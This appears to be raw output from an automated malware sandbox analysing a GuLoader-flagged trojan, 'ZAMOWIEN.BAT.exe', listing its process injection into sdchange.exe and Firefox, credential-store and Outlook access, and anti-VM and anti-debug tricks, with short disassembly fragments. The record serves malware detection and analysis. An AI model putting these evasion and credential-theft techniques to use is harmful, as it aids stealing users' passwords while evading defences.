Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ZAMOWIEN.BAT.exe
Source: ZAMOWIEN.BAT.exe, 00000004.00000003.2331545937.0000000032742000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ZAMOWIEN.BAT.exe
Source: ZAMOWIEN.BAT.exe, 00000004.00000003.2393602242.00000000028AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesdchange.exej% vs ZAMOWIEN.BAT.exe

Source: ZAMOWIEN.BAT.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/12@4/3

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

0_2_0040364B

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

File created: C:\Users\user\overlbene.lnk

Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

File created: C:\Users\user\AppData\Local\Temp\nswC98.tmp

Jump to behavior

Source: ZAMOWIEN.BAT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sdchange.exe, 00000006.00000003.2616531743.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2616421151.00000000033C7000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2884931299.00000000033E7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ZAMOWIEN.BAT.exe	ReversingLabs: Detection: 13%
Source: ZAMOWIEN.BAT.exe	Virustotal: Detection: 18%

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

File read: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
Source: C:\Windows\SysWOW64\sdchange.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\sdchange.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: ZAMOWIEN.BAT.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: sdchange.pdbGCTL source: ZAMOWIEN.BAT.exe, 00000004.00000003.2393602242.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885039540.00000000004E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iIQnSvahHYwDQ.exe, 00000005.00000002.2885324089.0000000000E0E000.00000002.00000001.01000000.0000000A.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000002.2885556820.0000000000E0E000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wntdll.pdbUGP source: ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2331545937.0000000032615000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2329811647.000000003246D000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2442207116.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2440236636.0000000004C27000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ZAMOWIEN.BAT.exe, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2331545937.0000000032615000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2329811647.000000003246D000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000006.00000003.2442207116.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2440236636.0000000004C27000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: sdchange.pdb source: ZAMOWIEN.BAT.exe, 00000004.00000003.2393602242.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885039540.00000000004E8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2063039037.0000000004F1D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Code function: 0_2_6E351BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6E351BFF

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 0_2_6E3530C0 push eax; ret	0_2_6E3530EE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327C225F pushad ; ret	4_2_327C27F9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327C27FA pushad ; ret	4_2_327C27F9
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327C283D push eax; iretd	4_2_327C2858
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F09AD push ecx; mov dword ptr [esp], ecx	4_2_327F09B6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04F827FA pushad ; ret	6_2_04F827F9
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04F8225F pushad ; ret	6_2_04F827F9
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04F8283D push eax; iretd	6_2_04F82858
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04FB09AD push ecx; mov dword ptr [esp], ecx	6_2_04FB09B6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_04F81368 push eax; iretd	6_2_04F81369
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C60E1 pushfd ; retf	6_2_030C60E2
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030CC715 pushad ; retf	6_2_030CC718
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030D45A0 push ss; iretd	6_2_030D46D4
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030D0B05 pushfd ; iretd	6_2_030D0B07
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030D091D pushad ; iretd	6_2_030D091E
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030BE8DC push ds; retf	6_2_030BE8E3
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C0CA1 push CD2A7FC7h; retf	6_2_030C0CA6
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030B149A pushfd ; ret	6_2_030B149D
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C1B12 push es; ret	6_2_030C1B78
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C1B79 push es; ret	6_2_030C1B78
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C7A01 pushad ; ret	6_2_030C7A05
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030B1AD6 push ss; retf	6_2_030B1B12
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030CB9DF push ebx; ret	6_2_030CB9EB
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030B78D4 push eax; retf	6_2_030B78D5
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030CDDAD push B857AF21h; retf	6_2_030CDDD7
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C7C19 push esi; ret	6_2_030C7C27
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030C7C20 push esi; ret	6_2_030C7C27
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052D7403 push cs; ret	6_2_052D740C
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052D67A6 pushad ; retf	6_2_052D67A7
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052D53AA pushad ; iretd	6_2_052D53AB
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_052D5FF1 push esi; iretd	6_2_052D5FF3

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	File created: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	File created: C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dll			Jump to dropped file

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	API/Special instruction interceptor: Address: 55063DD
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	API/Special instruction interceptor: Address: 1D863DD
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	RDTSC instruction interceptor: First address: 54C4B9E second address: 54C4B9E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7EE8FF7603h 0x00000006 test ah, ch 0x00000008 inc ebp 0x00000009 jmp 00007F7EE8FF7672h 0x0000000b cmp cl, 00000018h 0x0000000e inc ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	RDTSC instruction interceptor: First address: 1D44B9E second address: 1D44B9E instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7EE9075BE3h 0x00000006 test ah, ch 0x00000008 inc ebp 0x00000009 jmp 00007F7EE9075C52h 0x0000000b cmp cl, 00000018h 0x0000000e inc ebx 0x0000000f rdtsc

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Code function: 4_2_3286D1C0 rdtsc

4_2_3286D1C0

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dll			Jump to dropped file

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	API coverage: 0.2 %
Source: C:\Windows\SysWOW64\sdchange.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\sdchange.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 0_2_004069E5 FindFirstFileW,FindClose,	0_2_004069E5
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 0_2_00405D94 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D94
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 6_2_030CC980 FindFirstFileW,FindNextFileW,FindClose,	6_2_030CC980

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: ZAMOWIEN.BAT.exe, 00000000.00000002.2061447510.00000000009B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\&
Source: ZAMOWIEN.BAT.exe, 00000004.00000003.2330006530.000000000289C000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000002.2427235202.000000000289C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002859000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: sdchange.exe, 00000006.00000002.2884931299.0000000003377000.00000004.00000020.00020000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000002.2885100721.0000000000770000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2738306534.000001BC8EB7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	API call chain: ExitProcess graph end node			graph_0-2895
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	API call chain: ExitProcess graph end node			graph_0-2664

Source: C:\Windows\SysWOW64\sdchange.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\sdchange.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Code function: 4_2_3286D1C0 rdtsc

4_2_3286D1C0

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

0_2_0040364B

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

Code function: 0_2_6E351BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6E351BFF

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C5283 mov eax, dword ptr fs:[00000030h]	4_2_328C5283
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282329E mov eax, dword ptr fs:[00000030h]	4_2_3282329E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282329E mov eax, dword ptr fs:[00000030h]	4_2_3282329E
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328052A0 mov eax, dword ptr fs:[00000030h]	4_2_328052A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328052A0 mov eax, dword ptr fs:[00000030h]	4_2_328052A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328052A0 mov eax, dword ptr fs:[00000030h]	4_2_328052A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328052A0 mov eax, dword ptr fs:[00000030h]	4_2_328052A0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328872A0 mov eax, dword ptr fs:[00000030h]	4_2_328872A0
